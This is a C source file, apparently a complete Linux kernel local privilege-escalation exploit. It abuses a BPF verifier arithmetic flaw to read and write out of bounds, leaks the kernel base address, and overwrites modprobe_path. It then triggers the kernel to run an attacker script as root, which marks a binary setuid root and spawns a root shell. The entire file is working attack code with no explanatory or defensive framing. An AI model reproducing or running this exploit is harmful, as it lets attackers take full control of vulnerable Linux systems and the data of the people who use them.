#define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define ARRAY_MAP_OPS 10591360 #define MODPROBE_PATH 14943648 #define ARRAY_OF_MAP_OPS 10590880 /* start from kernel */ #define BPF_EMIT_CALL(FUNC) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_CALL, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = (FUNC) }) /* ??? */ #define BPF_MOV32_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_REG_ARG1 BPF_REG_1 #define BPF_REG_ARG2 BPF_REG_2 #define BPF_REG_ARG3 BPF_REG_3 #define BPF_REG_ARG4 BPF_REG_4 #define BPF_REG_ARG5 BPF_REG_5 #define BPF_PSEUDO_MAP_FD 1 #define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ ((struct bpf_insn) { \ .code = BPF_LD | BPF_DW | BPF_IMM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = (__u32) (IMM) }), \ ((struct bpf_insn) { \ .code = 0, /* zero is reserved opcode */ \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = ((__u64) (IMM)) >> 32 }) #define BPF_ALU32_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_LD_MAP_FD(DST, MAP_FD) \ BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) #define BPF_ALU32_REG(OP, DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_EXIT_INSN() \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_EXIT, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0 }) /* Memory store, *(uint *) (dst_reg + off16) = src_reg */ #define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_REG_FP BPF_REG_10 #define BPF_MOV64_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_ALU64_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_MOV64_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_REG_TMP BPF_REG_8 #define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_JMP_IMM(OP, DST, IMM, OFF) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_MOV64_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_ALU64_REG(OP, DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_MOV32_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) /* end from kernel */ unsigned long kern_base = 0; int bpf_(int cmd, union bpf_attr *attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } void array_get(int mapfd, uint32_t key, void* value) { union bpf_attr attr = { .map_fd = mapfd, .key = (uint64_t)&key, .value = (uint64_t)value, }; int res = bpf_(BPF_MAP_LOOKUP_ELEM, &attr); if (res) err(1, "map update elem"); } void array_set(int mapfd, uint32_t key, uint64_t value) { union bpf_attr attr = { .map_fd = mapfd, .key = (uint64_t)&key, .value = (uint64_t)&value, .flags = BPF_ANY, }; int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr); if (res) err(1, "map update elem"); } int run_bpf_code(int mapfd, struct bpf_insn* insns, unsigned int cnt) { char verifier_log[100000]; union bpf_attr create_prog_attrs = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = cnt, .insns = (uint64_t)insns, .license = (uint64_t)"", .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log }; int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs); if (progfd == -1) { perror("prog load"); puts(verifier_log); return 1; } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) err(1, "socketpair"); if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) err(1, "setsockopt"); if (write(socks[1], "aa", 2) != 2) err(1, "write"); int socks2[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks2)) err(1, "socketpair"); if (setsockopt(socks2[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) err(1, "setsockopt"); return socks2[1]; } unsigned long get_kern_base(void) { union bpf_attr create_map_attrs = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = 4, .value_size = 16, .max_entries = 16 }; int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs); if (mapfd == -1) err(1, "map create"); array_set(mapfd, 1, 2); struct bpf_insn insns[] = { BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // fill r0 with pointer to map value BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack BPF_MOV32_IMM(BPF_REG_ARG2, 0), BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP), BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2), BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit BPF_EXIT_INSN(), // exit // r1 = 0xffff'ffff, mistreated as 0xffff'ffff'ffff'ffff BPF_MOV64_IMM(BPF_REG_1, 0x0), // r1 = 0x1'0000'0000, mistreated as 0 BPF_MOV32_IMM(BPF_REG_2, 0xffffffff), // r1 = 0x1'0000'0000, mistreated as 0 BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), BPF_ALU64_IMM(BPF_RSH, BPF_REG_2, 32), BPF_ALU64_IMM(BPF_MUL, BPF_REG_2, 0x48), BPF_ALU64_REG(BPF_SUB, BPF_REG_1, BPF_REG_2), BPF_MOV64_REG(BPF_REG_3, BPF_REG_0), BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0), BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0), BPF_MOV32_IMM(BPF_REG_0, 0), BPF_EXIT_INSN() }; run_bpf_code(mapfd, insns, sizeof(insns) / sizeof(insns[0])); unsigned long val2[2] = {0,0}; array_get(mapfd, 0, &val2); printf("leak %p\n", val2[0]); return val2[0]-ARRAY_MAP_OPS; } unsigned long write_modprobe_path(void) { union bpf_attr create_map_attrs = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = 4, .value_size = 16, .max_entries = 16 }; int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs); if (mapfd == -1) err(1, "map create"); int mapfd2 = bpf_(BPF_MAP_CREATE, &create_map_attrs); if (mapfd2 == -1) err(1, "map create"); array_set(mapfd, 0, kern_base+MODPROBE_PATH); array_set(mapfd, 1, kern_base+MODPROBE_PATH+4); printf("writing modprobe_path @ %p with %s\n", kern_base+MODPROBE_PATH, "/tmp/x"); struct bpf_insn insns[] = { BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // fill r0 with pointer to map value BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack BPF_MOV32_IMM(BPF_REG_ARG2, 0), BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP), BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2), BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit BPF_EXIT_INSN(), // exit BPF_MOV64_IMM(BPF_REG_1, 0x0), // r1 = 0xffff'ffff, mistreated as 0xffff'ffff'ffff'ffff BPF_MOV32_IMM(BPF_REG_2, 0xffffffff), // // r1 = 0x1'0000'0000, mistreated as 0 BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), BPF_ALU64_IMM(BPF_RSH, BPF_REG_2, 32), BPF_ALU64_IMM(BPF_MUL, BPF_REG_2, 0x48), BPF_ALU64_REG(BPF_SUB, BPF_REG_1, BPF_REG_2), // compute noncanonical pointer BPF_MOV64_REG(BPF_REG_3, BPF_REG_0), BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0), BPF_MOV64_IMM(BPF_REG_2, kern_base+ARRAY_OF_MAP_OPS), BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_2, 0), BPF_MOV64_REG(BPF_REG_4, BPF_REG_0), BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // fill r0 with pointer to map value BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack BPF_MOV32_IMM(BPF_REG_ARG2, 0), BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP), BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2), BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit BPF_EXIT_INSN(), // exit BPF_MOV64_IMM(BPF_REG_1, 0x706d742f), BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0), BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // fill r0 with pointer to map value BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack BPF_MOV32_IMM(BPF_REG_ARG2, 1), BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP), BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2), BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit BPF_EXIT_INSN(), // exit BPF_MOV64_IMM(BPF_REG_1, 0x782f), BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0), BPF_MOV32_IMM(BPF_REG_0, 0), BPF_EXIT_INSN() }; run_bpf_code(mapfd, insns, sizeof(insns) / sizeof(insns[0])); return 0; } void write_file(char* filename, char* content) { int fd = open(filename, O_RDWR|O_CREAT); if(fd<0) { fprintf(stderr, "invalid open\n"); return; } write(fd, content, strlen(content)); close(fd); return; } int main(void) { setuid(0); if(getuid() == 0) { system("/bin/sh"); } system("rm /tmp/dummy 2>/dev/null"); system("rm /tmp/x 2>/dev/null"); write_file("/tmp/x", "#!/bin/sh\n/bin/chown root:root /home/user/crasher\n/bin/chmod u+s /home/user/crasher"); system("chmod 755 /tmp/x"); write_file("/tmp/dummy", "\xff\xff\xff\xff"); system("chmod 755 /tmp/dummy"); kern_base = get_kern_base(); printf("got kernel base leak: %p\n", kern_base); write_modprobe_path(); system("/tmp/dummy 2>/dev/null"); system("/home/user/crasher"); getchar(); }